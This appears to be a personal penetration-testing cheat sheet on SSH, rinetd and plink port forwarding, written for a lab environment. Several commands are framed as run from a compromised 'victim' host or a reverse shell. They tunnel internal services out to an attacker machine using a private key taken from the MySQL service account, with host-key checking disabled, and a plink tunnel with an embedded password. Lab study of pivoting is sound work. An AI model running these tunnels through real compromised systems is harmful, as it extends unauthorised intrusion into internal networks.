SSH

-N = no ouput

-f background

LocaL port forwarding

ssh -N -L [bind_address:]port:host:hostport [username@address]

e.g.

ssh -N -L 0.0.0.0:445:192.168.1.110:445 student@10.11.0.128

Remote port forwarding

ssh -N -R <Windows IP>:<Windows Unused Port>:<Kali IP>:<Kali port> <username>@<Windows>

e.g.

ssh -f -N -R 192.168.119.224:2221:127.0.0.1:3306 root@192.168.119.224
ssh -f -N -R 1122:10.5.5.11:22 -R 13306:10.5.5.11:3306 -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -i /tmp/keys/id_rsa kali@10.11.0.4
ssh -f -N -R 1080 -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -i /var/lib/mysql/.ssh/id_rsa kali@10.11.0.4

dynamic port forwarding

From victim:

ssh -D localhost:<local_proxy_port> -f -N <user>@<machine_to_pivot>
ssh -N -D 127.0.0.1:2221 student@192.168.224.44

(need to do full sT to scan hosts via this method)

priv/pub keys

On kali:

from="10.11.1.250",command="echo 'This account can only be used for port forwarding'",no-agent-forwarding,no-X11-forwarding,no-pty ssh-rsa ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCxO27JE5uXiHqoUUb4j9o/IPHxsPg+fflPKW4N6pK0ZXSmMfLhjaHyhUr4auF+hSnF2g1hN4N2Z4DjkfZ9f95O7Ox3m0oaUgEwHtZcwTNNLJiHs2fSs7ObLR+gZ23kaJ+TYM8ZIo/ENC68Py+NhtW1c2So95ARwCa/Hkb7kZ1xNo6f6rvCqXAyk/WZcBXxYkGqOLut3c5B+++6h3spOPlDkoPs8T5/wJNcn8i12Lex/d02iOWCLGEav2V1R9xk87xVdI6h5BPySl35+ZXOrHzazbddS7MwGFz16coo+wbHbTR6P5fF9Z1Zm9O/US2LoqHxs7OxNq61BLtr4I/MDnin www-data@ajla

rinetd

Nano /etc/rinetd.conf

0.0.0.0 PORT_LISTEN HOST_FORWARDED HOST_PORT

Plink

From victim:

.\plink.exe -ssh -l [user] -pw [password] -R [bind_address:][bind_port]:host:host_port  [address]
.\plink.exe -ssh -l root -pw toor -R 192.168.119.224:8008:127.0.0.1:3306 192.168.224.44

On rev shell:

Cmd.exe /c echo y | .\plink.exe -ssh -l root -pw toor -R 192.168.119.224:8008:127.0.0.1:3306 
192.168.224.44